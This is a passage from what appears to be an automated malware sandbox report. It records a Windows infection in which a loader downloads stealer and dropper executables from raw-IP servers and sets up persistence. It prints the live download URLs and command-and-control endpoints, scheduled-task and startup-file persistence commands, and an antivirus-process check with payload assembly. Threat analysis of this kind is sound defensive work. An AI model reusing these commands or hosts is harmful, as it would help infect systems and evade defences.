  - - C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
      "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4504
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2852
      - C:\Users\Admin\AppData\Roaming\vVRF3QNBae.exe
        
        "C:\Users\Admin\AppData\Roaming\vVRF3QNBae.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:704
      - C:\Users\Admin\AppData\Roaming\omORvZzPVW.exe
        
        "C:\Users\Admin\AppData\Roaming\omORvZzPVW.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2720
  - - C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
      "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2380
    - - C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2056
      - C:\Users\Admin\AppData\Local\Temp\1000035001\JLumma.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000035001\JLumma.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1444
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1916
      - C:\Users\Admin\AppData\Local\Temp\1000037001\JUmer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000037001\JUmer.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:1244
  - - C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
      "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\1000129001\SÐµtup.exe
      "C:\Users\Admin\AppData\Local\Temp\1000129001\SÐµtup.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:4980
    - - C:\Users\Admin\AppData\Local\Temp\service123.exe
        
        "C:\Users\Admin\AppData\Local\Temp\service123.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1804
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5056
  - - C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
      "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4596
    - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:688
  - - C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
      "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4080
  - - C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
      "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3392
  - - C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe
      "C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1484
    - - C:\Windows\SysWOW64\Explorer.exe
        
        "C:\Windows\SysWOW64\Explorer.exe"
        5⤵
        
        PID:4736
    - - C:\Windows\SysWOW64\Explorer.exe
        
        "C:\Windows\SysWOW64\Explorer.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3752
      - C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:956
        
        C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
        
        "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3424
      - C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2672
      - C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:816
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:2148
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:3024
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:436
        
        C:\Users\Admin\AppData\Roaming\rEA2qvRRsI.exe
        
        "C:\Users\Admin\AppData\Roaming\rEA2qvRRsI.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4080
        
        C:\Users\Admin\AppData\Roaming\hu01pHYE3x.exe
        
        "C:\Users\Admin\AppData\Roaming\hu01pHYE3x.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
      - C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:232
      - C:\Users\Admin\AppData\Local\Temp\1000223001\ba0113578b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000223001\ba0113578b.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4336
      - C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2216
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:816
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3364
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2568
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2164
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 684126
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3700
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "VegetablesIndividualBindingGba" Ever
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5008
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
        
        Intake.pif C
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4016
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4788
      - C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1128
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1128 -s 508
        7⤵
        Program crash
        
        PID:2352
      - C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3248
        
        C:\Windows\SysWOW64\Explorer.exe
        
        "C:\Windows\SysWOW64\Explorer.exe"
        7⤵
        
        PID:1964
      - C:\Users\Admin\AppData\Local\Temp\1000306001\vlst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000306001\vlst.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3784
      - C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:2568
      - C:\Users\Admin\AppData\Local\Temp\1000322001\appgate15.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000322001\appgate15.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:672
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:4576
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4608
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:412

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:544

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:2856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1128 -ip 1128
1⤵
PID:5072

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3408

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3552

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:4784

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4164

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4236

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1800

Network

POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 160
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/crypteda.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/crypteda.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:49 GMT
Content-Type: application/octet-stream
Content-Length: 1104936
Last-Modified: Mon, 19 Aug 2024 12:56:48 GMT
Connection: keep-alive
ETag: "66c34110-10dc28"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/stealc_default2.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/stealc_default2.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:52 GMT
Content-Type: application/octet-stream
Content-Length: 192000
Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT
Connection: keep-alive
ETag: "66c9f4f9-2ee00"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/S%D0%B5tup.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/S%D0%B5tup.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:53 GMT
Content-Type: application/octet-stream
Content-Length: 6682397
Last-Modified: Wed, 11 Sep 2024 18:05:59 GMT
Connection: keep-alive
ETag: "66e1dc07-65f71d"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/penis.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/penis.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:13 GMT
Content-Type: application/octet-stream
Content-Length: 506368
Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT
Connection: keep-alive
ETag: "66e099a7-7ba00"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/bundle.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/bundle.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:15 GMT
Content-Type: application/octet-stream
Content-Length: 311296
Last-Modified: Fri, 06 Sep 2024 02:12:34 GMT
Connection: keep-alive
ETag: "66da6512-4c000"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/dobre/acentric.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /dobre/acentric.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:16 GMT
Content-Type: application/octet-stream
Content-Length: 464896
Last-Modified: Sat, 07 Sep 2024 22:52:49 GMT
Connection: keep-alive
ETag: "66dcd941-71800"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.117/inc/gold.exe

axplong.exe

Remote address:

185.215.113.117:80

Request

GET /inc/gold.exe HTTP/1.1
Host: 185.215.113.117

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:47 GMT
Content-Type: application/octet-stream
Content-Length: 320000
Last-Modified: Wed, 11 Sep 2024 19:08:04 GMT
Connection: keep-alive
ETag: "66e1ea94-4e200"
Accept-Ranges: bytes
GET

http://185.215.113.117/inc/needmoney.exe

axplong.exe

Remote address:

185.215.113.117:80

Request

GET /inc/needmoney.exe HTTP/1.1
Host: 185.215.113.117

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:07 GMT
Content-Type: application/octet-stream
Content-Length: 3766272
Last-Modified: Wed, 04 Sep 2024 02:58:37 GMT
Connection: keep-alive
ETag: "66d7ccdd-397800"
Accept-Ranges: bytes
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
DNS

51.18.21.65.in-addr.arpa

Remote address:

8.8.8.8:53

Request

51.18.21.65.in-addr.arpa

IN PTR

Response

51.18.21.65.in-addr.arpa

IN PTR

static51182165clientsyour-serverde
DNS

17.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.113.215.185.in-addr.arpa

IN PTR

Response
DNS

114.44.225.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

114.44.225.188.in-addr.arpa

IN PTR

Response
DNS

iakovosioannidis.com

Remote address:

8.8.8.8:53

Request

iakovosioannidis.com

IN A

Response

iakovosioannidis.com

IN A

62.133.62.93
DNS

138.139.19.81.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.139.19.81.in-addr.arpa

IN PTR

Response

138.139.19.81.in-addr.arpa

IN PTR

40274ip-ptrtech
DNS

164.151.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

164.151.67.172.in-addr.arpa

IN PTR

Response
DNS

basedsymsotp.shop

Remote address:

8.8.8.8:53

Request

basedsymsotp.shop

IN A

Response

basedsymsotp.shop

IN A

104.21.78.130

basedsymsotp.shop

IN A

172.67.221.198
DNS

pastebin.com

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

104.20.4.235

pastebin.com

IN A

172.67.19.24

pastebin.com

IN A

104.20.3.235
DNS

130.78.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

130.78.21.104.in-addr.arpa

IN PTR

Response
DNS

commisionipwn.shop

Remote address:

8.8.8.8:53

Request

commisionipwn.shop

IN A

Response

commisionipwn.shop

IN A

104.21.38.33

commisionipwn.shop

IN A

172.67.218.77
DNS

tenntysjuxmz.shop

Remote address:

8.8.8.8:53

Request

tenntysjuxmz.shop

IN A

Response
DNS

tenntysjuxmz.shop

Remote address:

8.8.8.8:53

Request

tenntysjuxmz.shop

IN A

Response
DNS

117.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

117.113.215.185.in-addr.arpa

IN PTR

Response
DNS

26.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.113.215.185.in-addr.arpa

IN PTR

Response
DNS

ctldl.windowsupdate.com

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

ctldl.windowsupdate.com.delivery.microsoft.com

ctldl.windowsupdate.com.delivery.microsoft.com

IN CNAME

wu-b-net.trafficmanager.net

wu-b-net.trafficmanager.net

IN CNAME

bg.microsoft.map.fastly.net

bg.microsoft.map.fastly.net

IN A

199.232.210.172

bg.microsoft.map.fastly.net

IN A

199.232.214.172
DNS

53.107.216.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.107.216.95.in-addr.arpa

IN PTR

Response

53.107.216.95.in-addr.arpa

IN PTR

static5310721695clientsyour-serverde
DNS

158.233.202.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.233.202.91.in-addr.arpa

IN PTR

Response
DNS

20.143.216.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.143.216.95.in-addr.arpa

IN PTR

Response

20.143.216.95.in-addr.arpa

IN PTR

static2014321695clientsyour-serverde
DNS

conditionprovice.pro

Remote address:

8.8.8.8:53

Request

conditionprovice.pro

IN A

Response

conditionprovice.pro

IN A

81.19.139.138
DNS

preachstrwnwjw.shop

Remote address:

8.8.8.8:53

Request

preachstrwnwjw.shop

IN A

Response
DNS

preachstrwnwjw.shop

Remote address:

8.8.8.8:53

Request

preachstrwnwjw.shop

IN A

Response
GET

http://185.215.113.26/Nework.exe

axplong.exe

Remote address:

185.215.113.26:80

Request

GET /Nework.exe HTTP/1.1
Host: 185.215.113.26

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:50 GMT
Content-Type: application/x-msdos-program
Content-Length: 425984
Connection: keep-alive
Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT
ETag: "68000-620711078a800"
Accept-Ranges: bytes
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
